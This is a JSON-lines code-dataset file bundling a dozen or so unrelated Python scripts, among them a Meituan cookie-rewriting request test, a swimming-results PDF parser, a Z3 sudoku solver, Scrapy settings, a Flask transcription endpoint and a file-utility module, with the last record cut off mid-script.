+{"seq_id":"278555598","text":"\n\nfrom xai.brain.wordbase.nouns._byword import _BYWORD\n\n#calss header\nclass _BYWORDS(_BYWORD, ):\n\tdef __init__(self,): \n\t\t_BYWORD.__init__(self)\n\t\tself.name = \"BYWORDS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"byword\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_bywords.py","file_name":"_bywords.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"638762676","text":"import random\nimport re\nimport time\n\nimport requests\n\nfrom meituanwaimai.meituan.Ua_cookie import COOKIE\n\n\ndef _send_request(index, lat, long):\n url = \"http://i.waimai.meituan.com/openh5/homepage/poilist?_={}\".format(int(time.time()))\n form_data = {\n \"startIndex\": \"{}\".format(index),\n \"wm_actual_latitude\": \"{}\".format(lat),\n \"wm_actual_longitude\": \"{}\".format(long),\n }\n cookie = random.choice(COOKIE)\n print(cookie)\n old_lat = re.compile(r'w_actual_lat=(\\d+)').findall(cookie)[0]\n old_lng = re.compile(r'w_actual_lng=(\\d+)').findall(cookie)[0]\n cookie = cookie.replace(old_lat, str(lat))\n cookie = cookie.replace(old_lng, str(long))\n old_w_latlng = re.compile(r' w_latlng=(\\d+,\\d+);').findall(cookie)[0]\n cookie = cookie.replace(old_w_latlng, f'{lat},{long}')\n print(old_lat)\n print(cookie)\n print(old_w_latlng)\n headers = {\n \"Cookie\": cookie\n }\n\n\ndef main():\n _send_request(1, 2, 3)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"meituanwaimai/meituan/test_cookie.py","file_name":"test_cookie.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"161404406","text":"from competition import *\nfrom file_pdf import *\n\n\ndef get_pool(string):\n string = string.split(',')[1]\n start, end = string.index(' ('), string.index('м)')\n return Pool(title=string[1: start + 1], size=string[start + 2: end])\n\ndef get_discipline(string):\n distance, style = string.split('м ')\n return distance, style # {\"discipline\": {\"distance\": distance, \"style\": style}}\n\n\ndef get_result(string, gender):\n\n def clean(string):\n if string[0] in (\"0123456789-– \"):\n string = string[1:]\n return clean(string)\n else:\n return string\n\n def get_time(string):\n if string in (\"дискв\", \"неявка\"):\n return None, string\n else:\n string = string.replace('.', ':')\n string = string.replace(',', '.')\n return string, None\n\n string = clean(string).split(\" \")\n lastname, fistname = string[0].split()\n year_of_birth = string[1].strip()\n club_and_city = string[2].split(\",\")\n if len(club_and_city) == 1:\n club_and_city = club_and_city[0].split(\" \", 1)\n club = club_and_city[0]\n city = club_and_city[1].split()[-1]\n time_res, disqualification = get_time(string[3])\n rang = string[4]\n result = Result(lastname, fistname, year_of_birth, gender, club=club, city=city, time=time_res,\n disqualification=disqualification, rang=rang)\n return result\n\n\ndef parser(file_name):\n pdf = Pdf(file_name)\n content, event = pdf.get_content()\n new_competition, new_pool, distance, style, gender = None, None, None, None, None\n for namb, page in enumerate(content):\n for i, element in enumerate(page):\n if i in (0, 1, 3, 4, 5):\n continue\n elif i == 2:\n new_pool = get_pool(element[4])\n elif i == 6 and element[0] > 200:\n distance, style = get_discipline(element[4])\n elif element[0] > 185 and element[0] < 230:\n if new_competition is not None:\n new_competition.save_json()\n category = element[4]\n if \"Девочки\" in category or \"Девушки\" in category or \"Женщины\" in category or \"Юниорки\" in category:\n gender = \"famale\"\n else:\n gender = \"male\"\n new_competition = Competition(event, new_pool, category, style, distance)\n elif (element[0] > 32.2 and element[0] < 34) or (element[0] > 35 and element[0] < 36): # результаты\n result = get_result(element[4], gender)\n new_competition.add_result(result)\n elif element[0] > 43.4 and element[0] < 43.7 and '\\n' not in element[4]: # результа��ы\n result = get_result(element[4], gender)\n new_competition.add_result(result)\n if namb == 9:\n break\n\n\nif __name__ == \"__main__\":\n parser(\"1.pdf\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"397382513","text":"import networkx\nimport matplotlib.pyplot as plt\nimport warnings\n\nN= networkx.read_edgelist(r\"C:\\Users\\Varsha's PC\\Desktop\\web-google.csv\", delimiter=',', create_using=networkx.Graph())\nprint(networkx.info(N))\nprint(networkx.is_directed(N))\nN=networkx.fast_gnp_random_graph(20,0.5,directed=True)\nnetworkx.draw(N,with_labels=True)\nplt.show()\nprint(networkx.is_directed(N))\nprint(networkx.pagerank(N,alpha = 0.5))\n","sub_path":"Analyze_network.py","file_name":"Analyze_network.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"376173279","text":"from Bio import PDB\nfrom Bio.PDB import PDBParser, PDBIO\nfrom Bio.PDB.Atom import Atom \nfrom Bio.PDB.Residue import Residue\nfrom Bio.PDB.Structure import Structure\n\n#parse structure 1EHZ\nparser = PDBParser()\nstructure_1EHZ = parser.get_structure('1EHZ','1EHZ.pdb')\n\n#create list of atoms not to delete\natoms_not_del = [\n\t'P',\n\t'OP1',\n\t'OP2',\n\t'O5',\n\t'C5',\n\t'C4',\n\t'O4',\n\t'C1',\n\t'C2',\n\t'O2',\n\t'C3', \n\t'O3'\n]\n\n#get all atoms\nall_atoms = structure_1EHZ.get_atoms()\n\n#search for backbone and ribose atoms\nbackbone = []\nfor _atom in all_atoms:\n\tif _atom.get_name() not in atoms_not_del:\n\t\tresidue = _atom.get_parent() #get residue of atom\n\t\tresidue.detach_child(_atom.id) #delete atom from residue\n\n#save new structure to file\nbackbone = PDBIO()\nbackbone.set_structure(structure_1EHZ)\nbackbone.save('1EHZ_backbone.pdb')","sub_path":"task5.py","file_name":"task5.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"596331904","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport clipboard\nimport hashlib\nfrom sys import argv\nimport webbrowser\n\ndef hash_data(hashstring, hashfunction, url):\n '''Get the hash of given string.'''\n # Determine if a method for hashfunction\n # exists in hashlib. If no attribute/method is\n # found, default to sha1. \n if hasattr(hashlib, hashfunction):\n hash_method = getattr(hashlib, hashfunction)\n else:\n \thash_method = hashlib.sha1\n \n # Put hash to clipboard, if hashstring exists.\n if hashstring:\n \tclipboard.set(hash_method(hashstring).hexdigest())\n else:\n raise ValueError\n\n # Pythonista doesn't support x-callback.\n # So this is a pragmatic approach to calling\n # another app after hashing the string.\n webbrowser.open(url)\n\ndef parse_input(data):\n '''Parse input from Drafts command-line-like.'''\n parser = argparse.ArgumentParser(description='input a string to hash.')\n\n # Expects strings to hash.\n parser.add_argument('inputstring',\n metavar='STRING',\n nargs='*',\n help='the string to hash')\n \n # Set the hash function.\n parser.add_argument('-hs', '--hs', '-hash', '--hash',\n metavar='HASH-NAME',\n default='sha1',\n dest='hash',\n help='the hash function of hashlib to use. defaults to sha1')\n\n # Intended to set a callback-like action.\n # Use to open a specific app via url scheme, if necessary. Otherwise will open Drafts.\n parser.add_argument('-u', '--u', '-url', '--url',\n metavar='URL',\n default='drafts4://',\n dest='url',\n help='url scheme to call after hashing. use to call an app.')\n\n args = parser.parse_args(data)\n hash_data(' '.join(args.inputstring), args.hash, args.url)\n\nif __name__ == '__main__':\n parse_input(argv[1].split(' '))","sub_path":"drafts/string_hashes.py","file_name":"string_hashes.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"645257117","text":"import serial #Serial imported for Serial communication\nimport time #Required to use delay functions\nimport array\n\narduino = serial.Serial('/dev/ttyUSB0', 9600, timeout=.1) #Create Serial port object called ArduinoUnoSerialData time.sleep(2) #wait for 2 secounds for the communication to get established\ntime.sleep(2) #give the connection a second to settle\nloop = True\nfinger = array.array('i', (0 for i in range(0, 512)))\nwhile(loop):\n arduino.write(\"1\")\n data = arduino.readline()\n data = str(data)\n if (data != 'f'):\n input = arduino.readline()\n while (len(str(input)) < 3):\n input = arduino.readline()\n print(input)\n if (data == 'f'):\n print(\"Failed\")","sub_path":"src/files/examples/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"364113092","text":"# 系统给一个数字,用户输入猜数字,如果不相等,继续要用户猜\n\nnum=500\ncount=0\nwhile True:\n count+=1\n result=int(input(\"请输入结果:\"))\n\n if result==num:\n print(\"恭喜你,猜对了,答案就是:%d,你猜了%d次\"%(result,count))\n break\n elif result>num:\n print(\"你输入的数字,太大了\")\n else:\n print(\"你输入的数字,太小了\")","sub_path":"StudyPython/Python分支循环-综合案例猜数字.py","file_name":"Python分支循环-综合案例猜数字.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"469476925","text":"import os\n\nimport pytest\n\nfrom technews import mail_util\nfrom technews import TechNews\nfrom technews import EmailContentHelper\n\n\n@pytest.mark.skip(\"skip test email\")\ndef test_send_email_function():\n mh = EmailContentHelper()\n\n samples_list = [\n TechNews(\"orange\").get_news_by_page,\n TechNews(\"ithome\").get_news_by_page,\n TechNews(\"business\").get_news_by_page,\n TechNews(\"inside\").get_news_by_page\n ]\n\n news_rows = \"\"\n for sp_name in samples_list:\n samples = sp_name(2)\n news_rows += mh.get_news_html_contents(samples, samples[\"news_page_title\"])\n\n email_html = mh.get_email_html(\"Test-科技新聞\", news_rows)\n\n mail_util.mail_sender(\n os.environ[\"MAIL_SENDER\"], os.environ[\"MAIL_SENDER_PWD\"],\n os.environ[\"MAIL_RECV\"].split(\",\"), email_html, \"Test-科技新聞\", \"html\")\n\n\n@pytest.mark.skip(\"skip test email force error\")\ndef test_send_email_force_error():\n with pytest.raises(mail_util.SendEmailRetryTimeout):\n mail_util.mail_sender(\"\", \"\", \"\", \"\", \"Test-科技新聞\", \"plain\")\n","sub_path":"tests/test_mail_sender.py","file_name":"test_mail_sender.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"424357877","text":"#########################################\n# base.py\n#\n# Author zrong\n# Creation 2014-09-23\n# Last Editing 2015-01-30\n#########################################\n\n\"\"\"\n.. module:: base\n :platform: Unix, Windows\n :synopsis: 一些通用功能的封装。\n\n.. moduleauthor:: zrong(zengrong.net)\n\n\"\"\"\n\nimport os\nimport re\nimport sys\nimport zipfile\nimport shutil\nimport hashlib\nimport tempfile\nfrom string import Template\nfrom zrong import slog\n\n\nclass DictBase(dict):\n \"\"\"作为配置文件的基类。\n\n dict 默认不适合当作配置文件对象使用。如要有下面几点不便:\n \n #. 对于不存在的 key,会 raise KeyError 错误;\n #. dict不能使用 ``.`` 语法访问。\n\n :class:`DictBase` 解决了这些问题,还另外提供了一些方法在使用上更加方便。\n\n \"\"\" \n\n def __missing__(self, key):\n return None\n\n def __getattr__(self, name):\n return self[name]\n\n def __setattr__(self, name, value):\n self[name] = value\n \n def __delattr__(self, name):\n del self[name]\n\n def copy_from_dict(self, adict, parent=None):\n \"\"\"从一个已经存在的 dict 中复制所有的值。\n\n :param adict: 被复制的 dict。\n :type adict: dict\n :param parent: 复制到哪个父对象。\n 若为 None 则复制到 self 。\n :type parent: DictBase\n\n \"\"\"\n if not parent:\n parent = self\n for k,v in adict.items():\n if isinstance(v, dict):\n vDict = DictBase(v)\n self.copy_from_dict(v, vDict)\n parent[k] = vDict\n else:\n parent[k] = v\n\n def dump(self, human=False):\n \"\"\"将自身内容打印成字符串\n\n :param bool human: 若值为 True ,则打印成易读格式。\n\n \"\"\"\n txt = str(self)\n if human:\n txt = txt.replace(\", '\", \",\\n'\")\n txt = txt.replace(\"{\", \"{\\n\")\n txt = txt.replace(\"}\", \"\\n}\")\n txt = txt.replace(\"[\", \"[\\n\")\n txt = txt.replace(\"]\", \"\\n]\")\n return txt\n\n def save_to_file(self, path, human=True):\n \"\"\"将自身内容保存到文件。\n\n :param str path: 保存的文件路径。\n :param bool human: 参见 :func:`dump()`\n\n \"\"\"\n write_file(path, self.dump(human))\n slog.info(\"Save %a done.\", path)\n\n def read_from_file(self, path):\n \"\"\"从一个文本文件中读入信息。\n 假设该文本文件的格式与 :func:`dump()` 相同。\n\n :param str path: 待读入的文件路径。\n\n \"\"\"\n if not os.path.exists(path):\n slog.warning(\"The file %s is not exist.\", path)\n return False\n txt = read_file(path)\n dic = eval(txt)\n self.copy_from_dict(dic)\n return True\n\n copyFromDict = copy_from_dict\n saveToFile = save_to_file\n readFromFile = read_from_file\n\n\ndef list_dir(sourceDir, include_source=None, include_file=True):\n \"\"\"与 :func:`os.listdir()` 类似,但提供一些筛选功能,且返回生成器对象。\n\n :param str sourceDir: 待处理的文件夹。\n :param bool include_source: 遍历结果中是否包含源文件夹的路径。\n :param bool include_file: 是否包含文件。True 表示返回的内容中既包含文件,又\n 包含文件夹;Flase 代表仅包含文件夹。\n :return: 一个生成器对象。\n\n \"\"\"\n for cur_file in os.listdir(sourceDir):\n if cur_file.lower() == \".ds_store\":\n continue\n pathWithSource = os.path.join(sourceDir, cur_file)\n if include_file or os.path.isdir(pathWithSource):\n if include_source:\n yield pathWithSource\n else:\n yield cur_file\n\ndef copy_dir(sou_dir, dst_dir, del_dst=False, del_subdst=False):\n \"\"\":func:`shutil.copytree()` 也能实现类似功能,\n 但前者要求目标文件夹必须不存在。\n 而 copy_dir 没有这个要求,它可以将 sou_dir 中的文件合并到 dst_dir 中。\n\n :param str sou_dir: 待复制的文件夹;\n :param str dst_dir: 目标文件夹;\n :param bool del_dst: 是否删除目标文件夹。\n :param bool del_subdst: 是否删除目标子文件夹。\n\n \"\"\"\n if del_dst and os.path.isdir(del_dst):\n shutil.rmtree(dst_dir)\n os.makedirs(dst_dir, exist_ok=True)\n for cur_file in list_dir(sou_dir):\n dst_file = os.path.join(dst_dir, cur_file)\n cur_file = os.path.join(sou_dir, cur_file)\n if os.path.isdir(cur_file):\n if del_subdst and os.path.isdir(dst_file):\n shutil.rmtree(dst_file)\n os.makedirs(dst_file, exist_ok=True)\n copy_dir(cur_file, dst_file)\n else:\n shutil.copyfile(cur_file, dst_file)\n\ndef get_files(path, ext=[], include=True):\n \"\"\"遍历提供的文件夹的所有子文件夹,饭后生成器对象。\n\n :param str path: 待处理的文件夹。\n :param list ext: 扩展名列表。\n :param bool include: 若值为 True,代表 ext 提供的是包含列表;\n 否则是排除列表。\n :returns: 一个生成器对象。 \n\n \"\"\"\n has_ext = len(ext)>0\n for p, d, fs in os.walk(path):\n for f in fs:\n if has_ext:\n in_ext = False\n for name in ext:\n if f.endswith(name):\n in_ext = True\n break\n if (include and in_ext) or \\\n (not include and not in_ext):\n yield os.path.join(p,f)\n else:\n yield os.path.join(p, f)\n\ndef read_file(file_path):\n \"\"\"读取文本文件的内容。\n\n :param str file_path: 文件路径。\n :returns: 文件内容。\n :rtype: str\n\n \"\"\"\n with open(file_path, mode=\"r\",encoding=\"utf-8\") as afile:\n txt = afile.read()\n return txt\n\ndef write_file(file_path, txt):\n \"\"\"将文本内容写入文件。\n\n :param str file_path: 文件路径。\n :param str txt: 待写入的文件内容。\n\n \"\"\"\n if not os.path.exists(file_path):\n upDir = os.path.dirname(file_path)\n if not os.path.isdir(upDir):\n os.makedirs(upDir)\n\n with open(file_path, mode=\"w\",encoding=\"utf-8\") as afile:\n afile.write(txt)\n\ndef write_by_templ(templ, target, sub_value, safe=False):\n \"\"\"根据模版写入文件。\n\n :param str templ: 模版文件所在路径。\n :param str target: 要写入的文件所在路径。\n :param dict sub_value: 被替换的内容。\n\n \"\"\"\n templ_txt = read_file(templ)\n txt = None\n if safe:\n txt = Template(templ_txt).safe_substitute(sub_value)\n else:\n txt = Template(templ_txt).substitute(sub_value)\n write_file(target, txt)\n\ndef get_md5(path):\n \"\"\"获取文件的 MD5 值。\n\n :param str path: 文件路径。\n :returns: MD5 值。\n :rtype: str\n\n \"\"\"\n with open(path,'rb') as f:\n md5obj = hashlib.md5()\n md5obj.update(f.read())\n return md5obj.hexdigest()\n raise ZrongError(\"Error when get md5 for %s!\"%path)\n\ndef create_zip(files, trim_arcname=None, target_file=None, **zipfile_args):\n \"\"\"创建一个 zip 文件。\n\n :param list files: 要创建zip 的文件列表。\n :param int trim_arcname: 若提供这个值,则使用 ZipFile.write(filename, filename[trim_arcname:]) 进行调用。\n :returns: zip 文件的路径。\n :rtype: str\n\n \"\"\"\n zipname = None\n azip = None\n if not target_file:\n azip = tempfile.NamedTemporaryFile(mode='wb', delete=False)\n zipname = azip.name\n else:\n azip = target_file\n zipname = target_file.name if hasattr(azip, 'read') else azip\n slog.info('Package %d files to \"%s\"'%(len(files), azip.name))\n fileNum = len(files)\n curFile = 0\n zipfile_args['mode'] = 'w'\n if not zipfile_args.get('compression'):\n zipfile_args['compression'] = zipfile.ZIP_DEFLATED\n with zipfile.ZipFile(azip, **zipfile_args) as zipf:\n for f in files:\n percent = round(curFile/fileNum*100)\n sys.stdout.write('\\r%d%%'%(percent))\n sys.stdout.flush()\n zipf.write(f, f[trim_arcname:] if trim_arcname else None )\n curFile = curFile+1\n\n sys.stdout.write('\\r100%\\n')\n sys.stdout.flush()\n\n if hasattr(azip, 'close'):\n azip.close()\n return zipname\n\ndef get_max_ver(fmt, filelist):\n \"\"\"有一堆字符串,文件名均包含 %d.%d.%d 形式版本号,返回其中版本号最大的那个。\n 我一般用它来检测一堆发行版中版本号最大的那个文件。\n\n :param str fmt: 要检测测字符串形式,例如 zrong-%s.tar.gz ,其中 %s 会被正则替换。\n :param list files: 字符串列表。\n :returns: 版本号最大的字符串。\n :rtype: str\n\n \"\"\"\n x, y, z = 0,0,0\n verpat = fmt%'(\\d+).(\\d+).(\\d+)'\n verre = re.compile(r''+verpat+'', re.M) \n for f in filelist:\n match = verre.search(f)\n if match:\n x1 = int(match.group(1))\n y1 = int(match.group(2))\n z1 = int(match.group(3))\n if x1 >= x and y1 >= y:\n x = x1\n y = y1\n z = z1\n verfmt = fmt%('%d.%d.%d')\n name = verfmt%(x, y, z)\n if x == 0 and y == 0 and z == 0:\n slog.info('Can not find the string \"%s\" !'%name)\n return None\n return name\n\n","sub_path":"zrong/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":9554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"140411603","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for r18database project\n#\n# For simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n#\n\nBOT_NAME = 'r18database'\n\nSPIDER_MODULES = ['r18database.spiders']\nNEWSPIDER_MODULE = 'r18database.spiders'\n\nITEM_PIPELINES = {\n\t'scrapy.contrib.pipeline.images.ImagesPipeline': 1,\n#\t'r18database.mongo_pipeline}.MongoDBPipeline': 2,\n}\n\nIMAGES_STORE = 'E:\\Scrapy Download Data\\R18Database\\images'\nIMAGES_THUMBS = {\n\t'small': (50, 50),\n\t'big': (270, 270),\n}\n\n'''DOWNLOADER_MIDDLEWARES = {\n 'scrapy.contrib.downloadermiddleware.httpproxy.HttpProxyMiddleware': 110,\n}'''\n\nUSER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/536.5'\nCOOKIES_ENABLED = True\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n#USER_AGENT = 'r18database (+http://www.yourdomain.com)'\n","sub_path":"r18database/r18database/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"103370435","text":"import sys\nfrom itertools import combinations\nfrom z3 import *\n\n#Paste sudoku board here:\nsudokuInput = [ [6, 0, 0, 0, 8, 0, 0, 0, 1] , [0, 3, 0, 7, 0, 0, 6, 0, 0] , [0, 0, 0, 0, 1, 0, 0, 0, 7] , [0, 5, 0, 0, 3, 8, 4, 0, 0] , [3, 0, 0, 0, 4, 0, 0, 0, 0] , [0, 0, 4, 0, 0, 0, 0, 5, 3] , [0, 1, 0, 0, 0, 3, 0, 6, 0] , [0, 0, 3, 9, 0, 0, 0, 8, 5] , [9, 2, 8, 1, 0, 0, 3, 0, 0] ]\n\n#Checks that the input of the sudoku board is formatted properly with correct values 1-9\nif (len(sudokuInput) != 9):\n print('Invalid Sudoku input')\n sys.exit()\nfor row in sudokuInput:\n if(len(row) != 9):\n print('Invalid Sudoku input')\n sys.exit()\n for value in row:\n if(value < 0 or value > 9):\n print('Value in sudoku board is not within integer range 1-9!')\n sys.exit()\n\n\n# Creates z3 solver and holder with variables for Z3 to solve (solves all the 0 zero spaces on board)\nmySolver = Solver()\n\nz3Variables = [[] for i in range(9)]\nfor i in range(9):\n z3Variables[i] = Ints(\"X%s%s\" % (i,j) for j in range(9))\n\n\n\n# Initializes the z3 variables to either the board value, or sets the solver constraint for the unkown variable from 1-9\nfor i in range(len(sudokuInput)):\n for j in range(len(sudokuInput[i])):\n\n # Values of 0 represent unkown value, whereas anything else is already known\n if sudokuInput[i][j] != 0:\n mySolver.add(z3Variables[i][j] == sudokuInput[i][j])\n else:\n mySolver.add(z3Variables[i][j] >= 1)\n mySolver.add(z3Variables[i][j] <= 9)\n\n# Defines the rows within our board and adds constraints to Z3 solver:\nfor row in z3Variables:\n #Checks uniqueness of values in each row (makes sure 1-9 is only used once per row)\n for vals in combinations(row, 2):\n x, y = list(vals)\n mySolver.add(x != y)\n\n #Adds Z3 solver constraint that states the sum of row values should add to 45 (1+2+3+ ... + 9 = 45)\n mySolver.add(sum(row) == 45)\n\n# Defines the columns within our board and adds constraints to the Z3 solver: \nfor j in range(9):\n columnValues = []\n for i in range(9):\n columnValues.append(z3Variables[i][j])\n\n for vals in combinations(columnValues, 2):\n x, y = list(vals)\n mySolver.add(x != y)\n\n #Adds Z3 solver constraint that states the sum of row values should add to 45 (1+2+3+ ... + 9 = 45)\n mySolver.add(sum(columnValues) == 45)\n\n# Defines the 3x3 grids within our 9x9 board and adds constraints to Z3 solver:\nfor i in range(0, 9, 3): \n for j in range(0, 9, 3):\n gridValues = []\n\n for x in range(i, i + 3):\n for y in range(j, j + 3):\n gridValues.append(z3Variables[x][y])\n\n #Checks uniqueness of values in grid (makes sure 1-9 is only used once per grid)\n for vals in combinations(gridValues, 2):\n x, y = list(vals)\n mySolver.add(x != y)\n\n #Adds Z3 solver constraint that states the sum of grid values should add to 45 (1+2+3+ ... + 9 = 45)\n mySolver.add(sum(gridValues) == 45)\n\nresult = mySolver.check()\nif result == sat:\n model = mySolver.model()\n solvedSudoku = sudokuInput\n print(\"Solved Sudoku:\")\n for i in range(9):\n for j in range(9):\n if solvedSudoku[i][j] == 0:\n solvedSudoku[i][j] = model[z3Variables[i][j]]\n\n for row in solvedSudoku:\n print(row)\n\nelse:\n print('Cannot solve this Sudoku Puzzle!')\n\n\n","sub_path":"sudokuZ3Solver.py","file_name":"sudokuZ3Solver.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"447931331","text":"#!/usr/bin/env python3\nimport os\nimport argparse\n\nparser = argparse.ArgumentParser(\n description=\"This is a python3 script to\\\n automatic copy the template file, \\\n run simulation and analysis\")\nparser.add_argument(\"template\", help=\"the name of template file\")\nargs = parser.parse_args()\nprotein_name = args.template.strip('/')\nn = 20\ncal = \"~/opt/myCalcQValue_multi.py\"\n\nos.system(\"cp ~/opt/AAWSEM/\"+protein_name+\".pdb .\")\nos.system(\"python2 \"+cal+\" \"+protein_name+\".pdb dump.lammpstrj qw 0\")\nos.system(\"python2 \"+cal+\" \"+protein_name+\".pdb dump.lammpstrj qo 1\")\nos.system(\"python2 ~/opt/script/BuildAllAtomsFromLammps_seq.py dump.lammpstrj movie \"+protein_name+\".seq\")\n","sub_path":"AAWSEM/aawsem_cal.py","file_name":"aawsem_cal.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"47518054","text":"#encoding:utf-8\nfrom django.db import models\nfrom datetime import datetime\nclass Customer(models.Model):\n\tuserName=models.CharField(max_length=20,primary_key=True)\n\tdineName=models.CharField('饭店名',max_length=30)\n\taddress=models.CharField('饭店地址',max_length=100,default=' ')\n\tcontactQQ=models.CharField(max_length=20,blank=True)\n\tcontactWC=models.CharField(max_length=20,blank=True)\n\tcontactPhone=models.CharField(max_length=20,blank=True)\n\tphone=models.CharField(max_length=11,default=' ')\n\ttableNumber=models.PositiveSmallIntegerField(default=0)\n\tclass Meta:\n\t\tverbose_name='商户'\n\t\tverbose_name_plural='商户'\n\tdef __unicode__(self):\n\t\treturn self.userName\nclass Menu(models.Model): \n\tFOODTYPE=(\n\t\t('hotDishes','热菜'),\n\t\t('coldDishes','凉菜'),\n\t\t('soup','汤羹'),\n\t\t('stapleFood','主食'),\n\t\t('drinks','酒水'),\n\t)\n\ttypeDic={\n\t\t'hotDishes':'热菜',\n\t\t'coldDishes':'凉菜',\n\t\t'soup':'汤羹',\n\t\t'stapleFood':'主食',\n\t\t'drinks':'酒水'}\n\tfoodName=models.CharField('菜名',max_length=30)\n\tfoodType=models.CharField(max_length=20,default='hotDishes',choices=FOODTYPE)\n\tfoodId=models.CharField(max_length=20,blank=True)\n\tisHot=models.BooleanField(default=False)\n\tisDaily=models.BooleanField(default=False)\n\tfoodPrice=models.FloatField('价格',default=0)\n\towner=models.ForeignKey(Customer)\n\tfavor=models.PositiveSmallIntegerField('喜爱程度',default=0)\n\tclass Meta:\n\t\tverbose_name='菜品'\n\t\tverbose_name_plural='菜品'\n\tdef __unicode__(self):\n\t\treturn self.foodName\nclass Order(models.Model):\n\torderId=models.CharField(max_length=50,primary_key=True)\n\torderTime=models.DateTimeField(blank=True)\n\towner=models.ForeignKey(Customer)\n\tstate=models.SmallIntegerField(blank=True)\n\tcontent=models.TextField()\n\tseatNum=models.SmallIntegerField(default=0)\n\ttotal=models.CharField(max_length=30,default=\"0\")\n\tclass Meta:\n\t\tverbose_name='订单'\n\t\tverbose_name_plural='订单'\nclass SeatRealTime(models.Model):\n\towner=models.ForeignKey(Customer)\n\torder=models.ForeignKey(Order,null=True,blank=True,on_delete=models.SET_NULL)\n\tseatNum=models.SmallIntegerField(default=0)\n\tstate=models.SmallIntegerField(default=0)\t\n\tisPushed=models.BooleanField(default=False)\n\tphone=models.CharField(max_length=11,blank=True)\n\tclass Meta:\n\t\tverbose_name='桌台'\n\t\tverbose_name_plural='桌台'\n","sub_path":"menuManage/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"38599623","text":"from flask import Blueprint, request\n\nimport voice_to_text\n\ntranscribe_blueprint = Blueprint('root', __name__)\n\n\n@transcribe_blueprint.route(\"/transcribe\", methods=[\"GET\"])\ndef root_get():\n return \"\"\"Please send a post request instead. We need an audio file. You can send the request like this:\n import requests\n file = FileStorage(\n stream=open(\"audio_file.wav\", \"rb\", buffering=0),\n filename=\"audio_file.wav\",\n content_type=\"audio/wav\",\n )\n data = {\"audio_file\": file}\n result = requests.post(url, data=data)\"\"\"\n\n\n@transcribe_blueprint.route(\"/transcribe\", methods=[\"POST\"])\ndef root_post():\n print(request.files)\n print(request)\n if \"audio_file\" in request.files.keys():\n print(\"got here\")\n file = request.files['audio_file']\n text = voice_to_text.transcribe_audio(file, \"sphinx\")\n print(text)\n return '{{\"text\":\"{text}\",\"Code\":0}}'.format(text=text)\n else:\n return '{\"text\":\"No audio file received :(\",\"Code\":-1}'\n\n\n@transcribe_blueprint.route(\"/\", methods=[\"GET\"])\ndef rroot_get():\n\treturn \"You are probably looking for /transcribe\"\n","sub_path":"server/transcribe_blueprint.py","file_name":"transcribe_blueprint.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"575243909","text":"import skimage.io\nimport pandas as pd\nimport openslide\nimport sys\nimport os\nimport logging\nimport heapq\nimport numpy as np\nfrom tqdm import trange\nimport histomicstk as htk\nimport scipy as sp\nimport concurrent.futures\nfrom tqdm import tqdm\nfrom multiprocessing import Pool, Value\nimport time\nimport pickle\n\nLOG_FILENAME = 'failed_files.log'\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S',\n filename=LOG_FILENAME,\n filemode='w')\n\nargnum = len(sys.argv)\nif argnum != 2:\n sys.exit('wrong number of arguments:' + str(len(sys.argv))+'. Please enter a tumor type (gbm or lgg)')\ntumor_type = sys.argv[1]\nif tumor_type != \"gbm\" and tumor_type != \"lgg\":\n sys.exit(\"Wrong type. Please enter a tumor type (gbm or lgg)\")\n\nin_path = \"../tcga/dense/\" + tumor_type + \"/\"\nout_path = \"../tcga/\" + \"dense_features/\" + tumor_type + \"/\"\n\nimages = [in_path + imname for imname in os.listdir(in_path)]\n\ndef getPatName(filename):\n #pat_name = 'TCGA-02-0329'\n return filename.split(tumor_type+\"/\")[1][:len('TCGA-CS-4938')]\ndef getImageID(filename):\n return getPatName(filename) + filename[-5] # -1 